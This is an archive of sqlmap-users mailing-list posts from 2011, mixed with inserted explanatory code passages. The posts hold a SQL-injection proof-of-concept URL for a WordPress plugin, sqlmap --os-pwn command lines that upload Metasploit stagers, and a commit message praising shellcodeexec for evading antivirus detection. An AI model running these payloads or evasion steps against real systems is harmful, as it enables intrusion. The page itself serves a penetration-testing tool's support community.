>>   File "/pentest/database/sqlmap/lib/controller/controller.py", line 485, in start
>>     action()
>>   File "/pentest/database/sqlmap/lib/controller/action.py", line 136, in action
>>     conf.dbmsHandler.osPwn()
>>   File "/pentest/database/sqlmap/plugins/generic/takeover.py", line 243, in osPwn
>>     self.uploadMsfPayloadStager(web=web)
>>   File "/pentest/database/sqlmap/lib/takeover/metasploit.py", line 628, in uploadMsfPayloadStager
>>     self.webFileUpload(self.exeFilePathLocal, self.exeFilePathRemote, self.webDirectory)
>>   File "/pentest/database/sqlmap/lib/takeover/web.py", line 77, in webFileUpload
>>     retVal = self.__webFileStreamUpload(inputFP, destFileName, directory)
>>   File "/pentest/database/sqlmap/lib/takeover/web.py", line 96, in __webFileStreamUpload
>>     page = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False)
>>   File "/pentest/database/sqlmap/lib/request/connect.py", line 130, in getPage
>>     conn = multipartOpener.open(url, multipart)
>>   File "/usr/lib/python2.7/urllib2.py", line 391, in open
>>     response = self._open(req, data)
>>   File "/usr/lib/python2.7/urllib2.py", line 409, in _open
>>     '_open', req)
>>   File "/usr/lib/python2.7/urllib2.py", line 369, in _call_chain
>>     result = func(*args)
>>   File "/usr/lib/python2.7/urllib2.py", line 1173, in http_open
>>     return self.do_open(httplib.HTTPConnection, req)
>>   File "/usr/lib/python2.7/urllib2.py", line 1142, in do_open
>>     h.request(req.get_method(), req.get_selector(), req.data, headers)
>>   File "/usr/lib/python2.7/httplib.py", line 946, in request
>>     self._send_request(method, url, body, headers)
>>   File "/usr/lib/python2.7/httplib.py", line 987, in _send_request
>>     self.endheaders(body)
>>   File "/usr/lib/python2.7/httplib.py", line 940, in endheaders
>>     self._send_output(message_body)
>>   File "/usr/lib/python2.7/httplib.py", line 801, in _send_output
>>     msg += message_body
>> UnicodeDecodeError: 'ascii' codec can't decode byte 0x80 in position 387: ordinal not in range(128)
>> [*] shutting down at: 10:24:59
>> [root@localhost sqlmap]#
>> --
>>
>> Ahmed Shawky El-Antry
>> Pen-tester, Programmer and System administrator
>> lnxg33k owner "http://lnxg33k.wordpress.com"
>> Isecur1ty team member "http://www.isecur1ty.org"
>> Twitter @lnxg33k
>
>
> --
>
> Ahmed Shawky El-Antry
> Pen-tester, Programmer and System administrator
> lnxg33k owner "http://lnxg33k.wordpress.com"
> Isecur1ty team member "http://www.isecur1ty.org"
> Twitter @lnxg33k
>

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
From: Ahmed S. <ah...@is...> - 2011-04-25 08:32:04
|
it based uploading shell with the latest revision (r3770) but here is another issue

[10:30:07] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r3770), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.

sqlmap version: 1.0-dev (r3770)
Python version: 2.7
Operating system: posix
Command line: ./sqlmap.py -u ******************************************************* -p id --text-only --cookie PHPSESSID=omqf68n95iss0op71odobvnhh4; security=low --os-pwn
Technique: UNION
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
  File "./sqlmap.py", line 83, in main
    start()
  File "/pentest/database/sqlmap/lib/controller/controller.py", line 485, in start
    action()
  File "/pentest/database/sqlmap/lib/controller/action.py", line 136, in action
    conf.dbmsHandler.osPwn()
  File "/pentest/database/sqlmap/plugins/generic/takeover.py", line 245, in osPwn
    self.uploadShellcodeexec(web=web)
  File "/pentest/database/sqlmap/lib/takeover/metasploit.py", line 560, in uploadShellcodeexec
    self.webFileUpload(self.shellcodeexecLocal, self.shellcodeexecRemote, self.webDirectory)
  File "/pentest/database/sqlmap/lib/takeover/web.py", line 77, in webFileUpload
    retVal = self.__webFileStreamUpload(inputFP, destFileName, directory)
  File "/pentest/database/sqlmap/lib/takeover/web.py", line 96, in __webFileStreamUpload
    page = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False)
  File "/pentest/database/sqlmap/lib/request/connect.py", line 130, in getPage
    conn = multipartOpener.open(url, multipart)
  File "/usr/lib/python2.7/urllib2.py", line 391, in open
    response = self._open(req, data)
  File "/usr/lib/python2.7/urllib2.py", line 409, in _open
    '_open', req)
  File "/usr/lib/python2.7/urllib2.py", line 369, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.7/urllib2.py", line 1173, in http_open
    return self.do_open(httplib.HTTPConnection, req)
  File "/usr/lib/python2.7/urllib2.py", line 1142, in do_open
    h.request(req.get_method(), req.get_selector(), req.data, headers)
  File "/usr/lib/python2.7/httplib.py", line 946, in request
    self._send_request(method, url, body, headers)
  File "/usr/lib/python2.7/httplib.py", line 987, in _send_request
    self.endheaders(body)
  File "/usr/lib/python2.7/httplib.py", line 940, in endheaders
    self._send_output(message_body)
  File "/usr/lib/python2.7/httplib.py", line 801, in _send_output
    msg += message_body
UnicodeDecodeError: 'ascii' codec can't decode byte 0x84 in position 396: ordinal not in range(128)

[*] shutting down at: 10:30:07

On Mon, Apr 25, 2011 at 10:27 AM, Ahmed Shawky <ah...@is...> wrote:
> there is an issue when sqlmap comes to shell upload via os-shell or os-pwn
>
> [10:24:59] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r3767), retry
> your run with the latest development version from the Subversion repository.
> If the exception persists, please send by e-mail to
> sql...@li... the following text and any information
> required to reproduce the bug. The developers will try to reproduce the bug,
> fix it accordingly and get back to you.
>
> sqlmap version: 1.0-dev (r3767)
> Python version: 2.7
> Operating system: posix
> Command line: ./sqlmap.py -u ******************************************************* -p id --text-only --cookie PHPSESSID=omqf68n95iss0op71odobvnhh4; security=low --os-pwn
> Technique: UNION
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 83, in main
>     start()
>   File "/pentest/database/sqlmap/lib/controller/controller.py", line 485, in start
>     action()
>   File "/pentest/database/sqlmap/lib/controller/action.py", line 136, in action
>     conf.dbmsHandler.osPwn()
>   File "/pentest/database/sqlmap/plugins/generic/takeover.py", line 243, in osPwn
>     self.uploadMsfPayloadStager(web=web)
>   File "/pentest/database/sqlmap/lib/takeover/metasploit.py", line 628, in uploadMsfPayloadStager
>     self.webFileUpload(self.exeFilePathLocal, self.exeFilePathRemote, self.webDirectory)
>   File "/pentest/database/sqlmap/lib/takeover/web.py", line 77, in webFileUpload
>     retVal = self.__webFileStreamUpload(inputFP, destFileName, directory)
>   File "/pentest/database/sqlmap/lib/takeover/web.py", line 96, in __webFileStreamUpload
>     page = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False)
>   File "/pentest/database/sqlmap/lib/request/connect.py", line 130, in getPage
>     conn = multipartOpener.open(url, multipart)
>   File "/usr/lib/python2.7/urllib2.py", line 391, in open
>     response = self._open(req, data)
>   File "/usr/lib/python2.7/urllib2.py", line 409, in _open
>     '_open', req)
>   File "/usr/lib/python2.7/urllib2.py", line 369, in _call_chain
>     result = func(*args)
>   File "/usr/lib/python2.7/urllib2.py", line 1173, in http_open
>     return self.do_open(httplib.HTTPConnection, req)
>   File "/usr/lib/python2.7/urllib2.py", line 1142, in do_open
>     h.request(req.get_method(), req.get_selector(), req.data, headers)
>   File "/usr/lib/python2.7/httplib.py", line 946, in request
>     self._send_request(method, url, body, headers)
>   File "/usr/lib/python2.7/httplib.py", line 987, in _send_request
>     self.endheaders(body)
>   File "/usr/lib/python2.7/httplib.py", line 940, in endheaders
>     self._send_output(message_body)
>   File "/usr/lib/python2.7/httplib.py", line 801, in _send_output
>     msg += message_body
> UnicodeDecodeError: 'ascii' codec can't decode byte 0x80 in position 387: ordinal not in range(128)
>
> [*] shutting down at: 10:24:59
>
> [root@localhost sqlmap]#
>
> --
>
> - Ahmed Shawky El-Antry
> - Pen-tester, Programmer and System administrator
> - lnxg33k owner "http://lnxg33k.wordpress.com"
> - Isecur1ty team member "http://www.isecur1ty.org"
> - Twitter @lnxg33k

--

- Ahmed Shawky El-Antry
- Pen-tester, Programmer and System administrator
- lnxg33k owner "http://lnxg33k.wordpress.com"
- Isecur1ty team member "http://www.isecur1ty.org"
- Twitter @lnxg33k |
From: Ahmed S. <ah...@is...> - 2011-04-25 08:27:15
|
there is an issue when sqlmap comes to shell upload via os-shell or os-pwn

[10:24:59] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r3767), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.

sqlmap version: 1.0-dev (r3767)
Python version: 2.7
Operating system: posix
Command line: ./sqlmap.py -u ******************************************************* -p id --text-only --cookie PHPSESSID=omqf68n95iss0op71odobvnhh4; security=low --os-pwn
Technique: UNION
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
  File "./sqlmap.py", line 83, in main
    start()
  File "/pentest/database/sqlmap/lib/controller/controller.py", line 485, in start
    action()
  File "/pentest/database/sqlmap/lib/controller/action.py", line 136, in action
    conf.dbmsHandler.osPwn()
  File "/pentest/database/sqlmap/plugins/generic/takeover.py", line 243, in osPwn
    self.uploadMsfPayloadStager(web=web)
  File "/pentest/database/sqlmap/lib/takeover/metasploit.py", line 628, in uploadMsfPayloadStager
    self.webFileUpload(self.exeFilePathLocal, self.exeFilePathRemote, self.webDirectory)
  File "/pentest/database/sqlmap/lib/takeover/web.py", line 77, in webFileUpload
    retVal = self.__webFileStreamUpload(inputFP, destFileName, directory)
  File "/pentest/database/sqlmap/lib/takeover/web.py", line 96, in __webFileStreamUpload
    page = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False)
  File "/pentest/database/sqlmap/lib/request/connect.py", line 130, in getPage
    conn = multipartOpener.open(url, multipart)
  File "/usr/lib/python2.7/urllib2.py", line 391, in open
    response = self._open(req, data)
  File "/usr/lib/python2.7/urllib2.py", line 409, in _open
    '_open', req)
  File "/usr/lib/python2.7/urllib2.py", line 369, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.7/urllib2.py", line 1173, in http_open
    return self.do_open(httplib.HTTPConnection, req)
  File "/usr/lib/python2.7/urllib2.py", line 1142, in do_open
    h.request(req.get_method(), req.get_selector(), req.data, headers)
  File "/usr/lib/python2.7/httplib.py", line 946, in request
    self._send_request(method, url, body, headers)
  File "/usr/lib/python2.7/httplib.py", line 987, in _send_request
    self.endheaders(body)
  File "/usr/lib/python2.7/httplib.py", line 940, in endheaders
    self._send_output(message_body)
  File "/usr/lib/python2.7/httplib.py", line 801, in _send_output
    msg += message_body
UnicodeDecodeError: 'ascii' codec can't decode byte 0x80 in position 387: ordinal not in range(128)

[*] shutting down at: 10:24:59

[root@localhost sqlmap]#

--

- Ahmed Shawky El-Antry
- Pen-tester, Programmer and System administrator
- lnxg33k owner "http://lnxg33k.wordpress.com"
- Isecur1ty team member "http://www.isecur1ty.org"
- Twitter @lnxg33k |
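Both tracebacks in this thread end in httplib's `msg += message_body` raising UnicodeDecodeError from the ASCII codec. That is the Python 2 symptom of concatenating a unicode string with a byte string that contains non-ASCII bytes (here 0x80 / 0x84 somewhere inside the binary being uploaded): Python tries to decode the bytes as ASCII before joining them, and the first high byte fails. The following is an added example, not sqlmap's code, showing the approach that avoids the problem: build the whole multipart/form-data body as bytes and reject non-bytes file payloads at the source. It is written for Python 3, where the same mistake raises TypeError instead of UnicodeDecodeError; `build_multipart`, `parse_multipart`, the field names and `SAMPLE_BINARY` are all constructed for this illustration and are not the upload stager's real interface.

```python
import binascii
import os
import re

# Constructed stand-in for the binary being uploaded (an executable starts
# with "MZ"); it deliberately contains 0x80 and 0x84, the bytes the ASCII
# codec choked on in the tracebacks. Not a real stager or shellcode.
SAMPLE_BINARY = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x80\x84\x00\x00"


def build_multipart(fields, files, boundary=None):
    """Build a multipart/form-data request body entirely out of bytes.

    fields: {name: str}                ordinary text fields
    files:  {name: (filename, bytes)}  binary file parts
    Returns (Content-Type header value, body bytes).

    Every piece is encoded to bytes before it is joined, so a text part can
    never be concatenated with a binary part as str + bytes (the implicit
    ASCII decode that raised UnicodeDecodeError under Python 2).
    """
    if boundary is None:
        boundary = binascii.hexlify(os.urandom(16)).decode("ascii")
    delim = b"--" + boundary.encode("ascii")
    chunks = []
    for name, value in fields.items():
        chunks.append(delim + b"\r\n")
        chunks.append(b'Content-Disposition: form-data; name="%s"\r\n\r\n'
                      % name.encode("utf-8"))
        chunks.append(value.encode("utf-8") + b"\r\n")
    for name, (filename, data) in files.items():
        if not isinstance(data, (bytes, bytearray)):
            # Fail at the source instead of deep inside the HTTP library.
            raise TypeError("file part %r must be bytes, got %s"
                            % (name, type(data).__name__))
        chunks.append(delim + b"\r\n")
        chunks.append(b'Content-Disposition: form-data; name="%s"; filename="%s"\r\n'
                      % (name.encode("utf-8"), filename.encode("utf-8")))
        chunks.append(b"Content-Type: application/octet-stream\r\n\r\n")
        chunks.append(bytes(data) + b"\r\n")
    chunks.append(delim + b"--\r\n")
    return "multipart/form-data; boundary=" + boundary, b"".join(chunks)


def parse_multipart(content_type, body):
    """Decode a body produced by build_multipart the way the receiving upload
    stager would, returning {field name: raw bytes}. Minimal on purpose: it
    assumes the exact CRLF layout build_multipart emits."""
    boundary = content_type.split("boundary=", 1)[1].encode("ascii")
    delim = b"--" + boundary
    pieces = body.split(delim)
    if len(pieces) < 2 or not pieces[-1].startswith(b"--"):
        raise ValueError("missing closing boundary")
    parts = {}
    for piece in pieces[1:-1]:
        # Each piece is "\r\n<headers>\r\n\r\n<data>\r\n"; the CRLFs next to
        # the delimiters belong to the delimiters, not to the data.
        headers, _, data = piece[2:-2].partition(b"\r\n\r\n")
        match = re.search(rb'\bname="([^"]*)"', headers)
        if match is None:
            raise ValueError("part without a field name")
        parts[match.group(1).decode("utf-8")] = data
    return parts


def roundtrip(fields, files):
    """Build a body, decode it again and report whether every file part
    survived byte-for-byte."""
    ctype, body = build_multipart(fields, files)
    decoded = parse_multipart(ctype, body)
    return all(decoded[name] == bytes(data) for name, (_, data) in files.items())


if __name__ == "__main__":
    # Hypothetical stager fields: a target directory plus the binary itself.
    print(roundtrip({"dir": "/var/www"}, {"file": ("stager.bin", SAMPLE_BINARY)}))
```

The body returned by `build_multipart` can be handed to any HTTP client that accepts raw bytes; the point is that nothing on the sending side ever holds the binary as text, so the 0x80 and 0x84 bytes reach the stager intact.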
From: Bernardo D. A. G. <ber...@gm...> - 2011-04-25 00:40:23
|
Hi,

As of r3768 UPX is not part of sqlmap anymore and the --os-pwn switch has been slightly revamped. As per commit message:

"""
[...]
Now the Metasploit shellcode can not be run as a Metasploit generated payload stager anymore. Instead it can be run on the target system either via sys_bineval() (as it was before, anti-forensics mode, all the same) or via shellcodeexec executable.

Advantages are that:

* It is stealthier as the shellcode itself does not touch the filesystem, it's an argument passed to shellcodeexec at runtime.
* shellcodeexec is not (yet) recognized as malicious by any (Avast excluded) AV product.
* shellcodeexec binary size is significantly smaller than a Metasploit payload stager (even when packed with UPX).
* UPX now is not needed anymore, so sqlmap package is also way smaller and less likely to be detected itself as malicious by your AV software.
[...]
"""

Cheers,
Bernardo

On 21 April 2011 12:00, Miroslav Stampar <mir...@gm...> wrote:
> hi all.
>
> just to inform you that --os-pwn was down for last couple of days due
> to a bug (if run on non-Windows platforms) with packing of payloads as
> a result of our anti-virus avoiding maneuvers (UPX is falsely flagged
> as virus by 10% of antivirus software, and it's quite annoying that
> for example Avast triggers on official 0.9 release because of UPX).
>
> now everything should be back on track.
>
> kr
>
> --
> Miroslav Stampar
>
> E-mail: miroslav.stampar (at) gmail.com
> PGP Key ID: 0xB5397B1B

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F |
From: Bernardo D. A. G. <ber...@gm...> - 2011-04-25 00:20:56
|
Hi Tom,

In order to better understand what is going on and track down a possible bug, could you please provide us with the full output of your sqlmap command with --flush-session -v3 --parse-errors --columns -T <your_table_name> -D <your_db_name> -t traffic.log and send us the traffic log file too? You can mask sensitive information and send it privately to me and Miroslav to debug if you prefer.

Thank you,
Bernardo

On 24 April 2011 18:53, Tom Thumb <k1...@li...> wrote:
> When trying to dump a table containing over 10000 entries, only 32 results
> are returned (rows with id 8, 9, 90-99, 990-999, 9990-9999). All the other
> data is not dumped, and I can't understand why.
> Can anyone explain this behaviour?
> Obviously I'm pleased that my database does not appear to be completely
> exploitable, but I'm worried that I'm missing something simple, and that
> there is something a hacker could do to retrieve the rest of the data...
> Test subject is an MSSQL 2005 Database running on Windows 2003.

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F |
From: Bernardo D. A. G. <ber...@gm...> - 2011-04-24 23:52:35
|
Hi Emiliano,

On 24 April 2011 22:21, Emiliano Bazaes <emi...@7e...> wrote:
> ...
> Here's this poc provided in the advisory:
>
> http://[host]/wp-content/plugins/ajax-category-dropdown/includes/dhat-ajax-cat-dropdown-request.php?admin&category_level=2&category_id=1%20union%20select%201,user%28%29,3,4,5,6,7,8,9,version%28%29%20--%201
>
> As you can see there's a 10 columns UNION, of which columns 2 and 10 are
> rendered on the page; so when you try the above proof-of-concept on a
> vulnerable target it should render a single item dropdown box in the format:
>
> db_user (db_version)
>
> However, I couldn't seem to be able to exploit it via sqlmap
> ...

The detection engine fails to detect this specific UNION query SQL injection because the HTTP response bodies for valid and invalid numbers of injected columns differ very little. In order to avoid this problem, you can run sqlmap with the --text-only switch, where only the proper text of the response bodies is considered for matching/comparison (by excluding HTML tags, scripts, etc. - see the user's manual for details).

Regards,
Bernardo and Miroslav

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F |
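To make the comparison problem in the reply above concrete, here is an added example; it is not sqlmap's code, and sqlmap's real page-comparison logic and thresholds live in its own source. It builds two constructed responses for a dropdown page like the one in the advisory: one where the UNION has the right number of columns and renders the extra "db_user (db_version)" item, and one where the column count is wrong and the select comes back empty. A long inline script block stands in for the WordPress template markup that is identical in both responses. Comparing the raw bodies with difflib gives a ratio close to 1, so the two responses are nearly indistinguishable; comparing only the visible text, which is the idea behind --text-only, separates them clearly. All page content, names and values are constructed for the illustration.

```python
import difflib
from html.parser import HTMLParser

# Constructed responses standing in for the plugin's dropdown page; no real
# target was involved. The long inline script is synthetic padding that plays
# the role of the template markup which is identical in every response.
PADDING_SCRIPT = '<script type="text/javascript">\n' + "".join(
    "var dhat_cfg_%d = {id: %d, ajax: true};\n" % (i, i) for i in range(250)
) + "</script>\n"


def render_page(options_html):
    """Wrap a list of <option> elements in the constant page template."""
    return (
        "<html><head><title>Category dropdown</title>\n"
        + PADDING_SCRIPT
        + '<style type="text/css">select.dhat { width: 240px; }</style>\n'
        + '</head><body><div class="dhat-wrap">\n'
        + '<select class="dhat" name="category_id" onchange="dhat_update(this)">\n'
        + options_html
        + "\n</select></div></body></html>\n"
    )


# Right column count: the injected columns 2 and 10 show up as one extra item
# in the "db_user (db_version)" shape described in the advisory.
UNION_OK = render_page(
    '<option value="1">Uncategorized</option>\n'
    '<option value="1">root@localhost (5.1.41)</option>'
)
# Wrong column count: the UNION query fails and the select is rendered empty.
UNION_BAD = render_page("")


class _VisibleText(HTMLParser):
    """Collect only the text a user would see; skip <script>/<style> bodies."""

    def __init__(self):
        super().__init__()
        self._hidden = 0
        self.chunks = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._hidden += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._hidden:
            self._hidden -= 1

    def handle_data(self, data):
        if not self._hidden:
            self.chunks.append(data)


def visible_text(html):
    """Strip tags, scripts and styles; collapse whitespace."""
    parser = _VisibleText()
    parser.feed(html)
    parser.close()
    return " ".join(" ".join(parser.chunks).split())


def similarity(a, b, text_only=False):
    """Ratio in [0, 1] of how alike two responses are; with text_only=True the
    comparison is made on the visible text instead of the raw body."""
    if text_only:
        a, b = visible_text(a), visible_text(b)
    return difflib.SequenceMatcher(None, a, b).ratio()


def compare(a, b):
    """Both ratios side by side: 'full' stays close to 1 because the shared
    template dominates, 'text_only' drops once the markup is ignored."""
    return {"full": similarity(a, b), "text_only": similarity(a, b, text_only=True)}


if __name__ == "__main__":
    print(compare(UNION_OK, UNION_BAD))
```

The larger the template relative to the injected data, the closer the raw-body ratio creeps to 1; on a real WordPress page the injected item is a few dozen bytes inside tens of kilobytes of markup, which is exactly the situation where stripping to visible text first makes the difference detectable.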
From: Emiliano B. <emi...@7e...> - 2011-04-24 21:21:43
|
Hi,

I just read this "Multiple SQL Injection in Ajax Category Dropdown wordpress plugin" advisory published by High-Tech Bridge: http://www.htbridge.ch/advisory/multiple_sql_injection_in_ajax_category_dropdown_wordpress_plugin.html

Among others there's a generic UNION inject on the *category_id* GET parameter, and I decided to try it with sqlmap. Here's this poc provided in the advisory:

http://[host]/wp-content/plugins/ajax-category-dropdown/includes/dhat-ajax-cat-dropdown-request.php?admin&category_level=2&category_id=1%20union%20select%201,user%28%29,3,4,5,6,7,8,9,version%28%29%20--%201

As you can see there's a 10 columns UNION, of which columns 2 and 10 are rendered on the page; so when you try the above proof-of-concept on a vulnerable target it should render a single item dropdown box in the format:

db_user (db_version)

However, I couldn't seem to be able to exploit it via sqlmap.

So, being aware it was a Linux box and considering WordPress runs on MySQL, I used the following as a base for the test:

./sqlmap.py --os linux --dbms mysql --technique U --union-cols 9-11 -p category_id --referer "http://[host]/" -u "http://[host]/wp-content/plugins/ajax-category-dropdown/includes/dhat-ajax-cat-dropdown-request.php?admin&category_level=2&category_id=1"

And then I tried everything from _--level 1_ to _5_, from _--risk 1_ to _3_, with and without _--string "Uncategorized"_ (which applies for GET _category_id=1_), and even _--prefix " union select " --suffix " -- 1"_; all with no luck.

In the end I removed all of the previous flags until I was finally able to exploit an _OR boolean-based blind - WHERE or HAVING clause_ and a _MySQL > 5.0.11 OR time-based blind_ inject, only when using _--risk 3 --level 2_; there was also a _MySQL < 5.0.12 AND time-based blind (heavy query)_ on _--risk 2 --level 2_, but it was too much for the server.

But still, no way to exploit the actual UNION flaw via sqlmap. Any clue?

--
Emiliano |
From: Tom T. <k1...@li...> - 2011-04-24 18:05:42
|
When trying to dump a table containing over 10000 entries, only 32 results are returned (rows with id 8, 9, 90-99, 990-999, 9990-9999). All the other data is not dumped, and I can't understand why.

Can anyone explain this behaviour?

Obviously I'm pleased that my database does not appear to be completely exploitable, but I'm worried that I'm missing something simple, and that there is something a hacker could do to retrieve the rest of the data...

Test subject is an MSSQL 2005 Database running on Windows 2003. |
From: Goce T. <amo...@gm...> - 2011-04-24 03:11:53
|
I've been doing some experiments with sqlmap and I found out that when I turn off ICMP so there is no ping reply from the target server, sqlmap is not working and it says connection timed out. It would be great if there were an option to treat the host as online and not ping it.

Best regards,
Amon. |